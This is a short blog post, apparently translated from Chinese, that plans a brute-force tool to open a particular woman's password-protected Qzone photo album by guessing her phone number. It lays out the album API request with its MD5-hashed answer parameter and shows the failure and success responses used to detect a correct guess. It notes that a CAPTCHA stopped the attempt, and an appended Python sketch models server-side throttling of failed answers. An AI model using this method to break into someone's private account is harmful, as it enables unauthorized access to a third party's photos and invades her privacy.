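Python penetration testing

I plan to write a tool for getting into encrypted (password-protected) Qzone albums.

Analysis:

Her album password is a phone number, so first write a script that generates phone numbers.

Her Qzone shows her previous phone number, so her current number is very likely with the same carrier, e.g. China Mobile (this narrows the password range).

Create an encrypted album of my own and test against it with the tool, to see how the response content differs between success and failure.

Extend the tool so it can combine several password types.

Notes: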

https://h5.qzone.qq.com/proxy/domain/photo.qzone.qq.com/fcgi-bin/cgi_list_photo
?g_tk=238297171
&callback=shine3_Callback
&t=247612204
&mode=0
&idcNum=4
&hostUin=xxx9883609
&topicId=V12sTtCU1D7iEU
&noTopic=0
&uin=xxx3633125
&pageStart=0
&pageNum=1
&skipCmtCount=0
&singleurl=1
&batchId=
&notice=0
&appid=4
&inCharset=utf-8
&outCharset=utf-8
&source=qzone
&plat=qzone
&outstyle=json
&format=jsonp
&json_esc=1
&question=%E6%89%8B%E6%9C%BA
&answer=E10ADC3949BA59ABBE56E057F20F883E
&callbackFun=shine3
&_=1510406853362

 

Result:

shine3_Callback({
	"code":-10805,
	"subcode":-10805,
	"message":"对不起,回答错误",
	"notice":0,
	"time":1510406993,
	"tips":"2A93-540",
	"data":{
   "priv" : 5,
   "question" : "手机",
   "t" : "247612204"
}

}
);

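&question=%E6%89%8B%E6%9C%BA (手机, "phone")

&answer=E10ADC3949BA59ABBE56E057F20F883E (123456)

answer is the MD5 hash of the password.

Tool: http://www.cmd5.com/

Entering the correct password gives: adadacb7c2658e921758d3c4bf90765d

Convert to upper case: https://bigtosmall.51240.com/

ADADACB7C2658E921758D3C4BF90765D

Replacing the earlier wrong value with this one returns: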

shine3_Callback({
	"code":0,
	"subcode":0,
	"message":"",
	"default":0,
	"data":
{
   "limit" : 0,
   "photoList" : [
      {
         "batchId" : "1510404687051",
         "browser" : 0,
         "cameratype" : " ",
         "cp_flag" : false,
         "cp_x" : 540,
         "cp_y" : 822,
         "desc" : "",
         "exif" : {
            "exposureCompensation" : "",
            "exposureMode" : "",
            "exposureProgram" : "",
            "exposureTime" : "",
            "flash" : "",
            "fnumber" : "",
            "focalLength" : "",
            "iso" : "",
            "lensModel" : "",
            "make" : "",
            "meteringMode" : "",
            "model" : "",
            "originalTime" : ""
         },
         "forum" : 0,
         "frameno" : 0,
         "height" : 1920,
         "id" : 0,
         "is_video" : false,
         "is_weixin_mode" : 0,
         "ismultiup" : 0,
         "lloc" : "NDR02be2ojjyBloPIfkr8gAAAAAAAAA!",
         "modifytime" : 1510404664,
         "name" : "2017-11-11",
         "origin" : 0,
         "origin_upload" : 0,
         "origin_url" : "",
         "owner" : "xxx9883609",
         "ownername" : "xxx9883609",
         "photocubage" : 16930,
         "phototype" : 17,
         "picmark_flag" : 0,
         "picrefer" : 66,
         "platformId" : 52,
         "platformSubId" : 2,
         "poiName" : "",
         "pre" : "http:\/\/b242.photo.store.qq.com\/psbe?\/V12sTtCU1D7iEU\/oAaS.Z7tyAdknNEKQ4Q0GA3.hQnCs9Y0Qj1oL6LMm.h*f98*I9KDIQPU7uIDVz7i\/a\/dPIAAAAAAAAA&bo=OASABwAAAAARB4s!",
         "raw" : "",
         "raw_upload" : 0,
         "rawshoottime" : "2017-11-08 14:24:07",
         "shoottime" : "2017-11-08 ",
         "shorturl" : "",
         "sloc" : "NDR02be2ojjyBloPIfkr8gAAAAAAAAA!",
         "tag" : "",
         "uploadtime" : "2017-11-11 20:51:04",
         "url" : "http:\/\/b242.photo.store.qq.com\/psbe?\/V12sTtCU1D7iEU\/oAaS.Z7tyAdknNEKQ4Q0GA3.hQnCs9Y0Qj1oL6LMm.h*f98*I9KDIQPU7uIDVz7i\/b\/dPIAAAAAAAAA&bo=OASABwAAAAARB4s!",
         "width" : 1080,
         "yurl" : 0
      }
   ],
   "t" : "247612204",
   "topic" : {
      "bitmap" : "10000010",
      "browser" : 0,
      "classid" : 106,
      "comment" : 1,
      "cover_id" : "NDR02be2ojjyBloPIfkr8gAAAAAAAAA!",
      "createtime" : 1510404663,
      "desc" : "",
      "handset" : 0,
      "id" : "V12sTtCU1D7iEU",
      "is_share_album" : 0,
      "lastuploadtime" : 1510404703,
      "modifytime" : 1510406803,
      "name" : "2017.11.11",
      "ownerName" : "xxx9883609",
      "ownerUin" : "xxx9883609",
      "pre" : "http:\/\/b242.photo.store.qq.com\/psbe?\/V12sTtCU1D7iEU\/5RnntLai7oEQE6i*OnXeN8nUGyyqEZCHil*JmmZ1rCnbXCVtjR9Cg8QqrISTQ3Wt\/a\/dPIAAAAAAAAA",
      "priv" : 5,
      "pypriv" : 3,
      "share_album_owner" : 0,
      "total" : 10,
      "url" : "http:\/\/b242.photo.store.qq.com\/psbe?\/V12sTtCU1D7iEU\/5RnntLai7oEQE6i*OnXeN8nUGyyqEZCHil*JmmZ1rCnbXCVtjR9Cg8QqrISTQ3Wt\/b\/dPIAAAAAAAAA",
      "viewtype" : 2

 

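The correct result is returned.

We can tell whether the password was right or wrong from the value of code in the shine3_Callback response.

Of course, reality is never that kind: after several attempts I found that a CAPTCHA appears. Tencent really did think of damn near everything!

How to get the CAPTCHA still needs some research. To be continued...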
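Seen from the service's side, the CAPTCHA described above is a throttle on failed answers. A sketch of such a check, added here as an example and not taken from the original post or from Tencent's implementation: the event tuple layout, the window and the threshold are assumptions, and only the wrong-answer code -10805 comes from the response shown above.

```python
from collections import defaultdict, deque

WRONG_ANSWER = -10805   # "code" value the page shows for a wrong album answer
WINDOW_SECONDS = 300    # assumed policy: look back five minutes
MAX_FAILURES = 3        # assumed policy: challenge after three wrong answers

# Constructed sample events: (unix time, requesting uin, album topicId, response code)
SAMPLE_EVENTS = [
    (1510406990, "visitor-A", "album-1", -10805),
    (1510406993, "visitor-A", "album-1", -10805),
    (1510406995, "visitor-B", "album-2", -10805),
    (1510406997, "visitor-A", "album-1", -10805),
    (1510407001, "visitor-A", "album-1", -10805),
    (1510407400, "visitor-B", "album-2", -10805),
    (1510407405, "visitor-B", "album-2", 0),
]

def captcha_decisions(events, window=WINDOW_SECONDS, limit=MAX_FAILURES):
    """Return, per event, whether a CAPTCHA should be required before the
    answer is checked, given the wrong answers already seen for that album."""
    failures = defaultdict(deque)   # topicId -> timestamps of recent wrong answers
    decisions = []
    for ts, uin, topic, code in sorted(events):
        recent = failures[topic]
        # Drop failures that have fallen out of the sliding window.
        while recent and ts - recent[0] > window:
            recent.popleft()
        # Counting per album (not per visitor) keeps the limit in force
        # no matter which account sends the request.
        decisions.append((ts, uin, topic, len(recent) >= limit))
        if code == WRONG_ANSWER:
            recent.append(ts)
    return decisions

def challenged(events):
    """Timestamps of the requests that would be challenged."""
    return [ts for ts, _, _, need in captcha_decisions(events) if need]

if __name__ == "__main__":
    for row in captcha_decisions(SAMPLE_EVENTS):
        print(row)
```

Because the client sends an MD5 of the answer, the server sees only a hash either way; the per-album failure count is what actually bounds guessing.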

 

posted @ 2017-11-05 17:27  懒企鹅